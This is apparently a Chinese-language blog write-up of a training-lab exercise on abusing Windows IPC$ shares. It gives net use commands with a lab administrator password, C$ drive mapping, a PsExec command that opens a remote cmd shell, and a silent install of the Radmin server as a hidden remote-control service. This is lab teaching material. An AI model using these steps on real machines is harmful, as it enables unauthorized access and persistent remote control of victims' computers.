(实验经验分享)网络攻击与对抗 > 实验六:IPC$管道的利用与远程控制

这是在 合天网安实验室一次的线上学习写出来的经验分享,很好的网站,也希望大家来学习交流
实验地址:http://erange.heetian.com/

实验简介

实验所属系列:网络攻击与对抗

实验对象:本科/专科信息安全专业
相关课程及专业:信息网络安全概论、计算机网络
实验时数(学分):2学时
实验类别:实践实验类

实验目的

1.了解IPC$漏洞原理

2.掌握IPC$漏洞攻击方法;

3.掌握psExec工具的使用;

 4.掌握远程控制工具radmin的使用。

预备知识

本实验要求实验者具备如下的相关知识。

      IPC$ (Internet Process Connection) 是共享“命名管道”的资源,它是为了让进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行数据交换,从而实现对远程计算机的访问。IPC$是NT/2000及之后OS的一项新功能。一些别有用心者可以利用黑客工具软件对主机进行IPC$漏洞探测。如果用户设置的口令较弱而被破解,那么通过建立IPC$连接的以下命令,攻击者就可以轻易地进入到系统中进行任意操作。

      net use \\远程主机IP “密码” /user: “用户名”与远程主机建立IPC$连接通道

      net use z: \\远程主机ip\c$                       将远程主机的C盘影射为本地Z盘

      copy e:\a.txt \\远程主机ip\c$                    拷贝本地文件e:\a.txt到远程主机

      net use \\远程主机ip /del                        删除与远程主机的IPC$连接。

正文开始

0x01.环境准备。

(实验经验分享)网络攻击与对抗 > 实验六:IPC$管道的利用与远程控制_第1张图片

(实验经验分享)网络攻击与对抗 > 实验六:IPC$管道的利用与远程控制_第2张图片


这是两台试验环境靶机的ip地址。
net share查看是否开启了ipc$。
(实验经验分享)网络攻击与对抗 > 实验六:IPC$管道的利用与远程控制_第3张图片(实验经验分享)网络攻击与对抗 > 实验六:IPC$管道的利用与远程控制_第4张图片
都已经开启了。

net use \\10.1.1.28“mD4rkpdje” /user: “administrator”     //与目标主机建立IPC$连接通道

      net use z: \\10.1.1.28\c$                                          //将目标主机的C盘影射为本地Z盘

     

0x02.实施攻击


安装radmin软件,将安装目录下的r_server.exe、raddrv.dll、AdmDll.dll拷贝粘贴到映射的z盘,即远程主机的C盘。

      利用psexec工具获得对方的Shell。安装psexec工具,cmd中进入psexec.exe工具所在目录:


 Psexec.exe \10.1.1.28–u administrator–p mD4rkpdje cmd.exe;

这样就能在我自己的cmd中弹回一个28靶机的cmdshell回来,随意的执行命令。

我们用这个shell来进行安装r_server。


  C:\r_server /install /pass:f4ck /:4899 /silence  //安装命令

net start r_server //启动命令

运行本地的Radmin输入刚才配置好的密码和端口(我这里是f4ck和 4899)便可以远程桌面受害靶机了。

你可能感兴趣的:((实验经验分享)网络攻击与对抗 > 实验六:IPC$管道的利用与远程控制)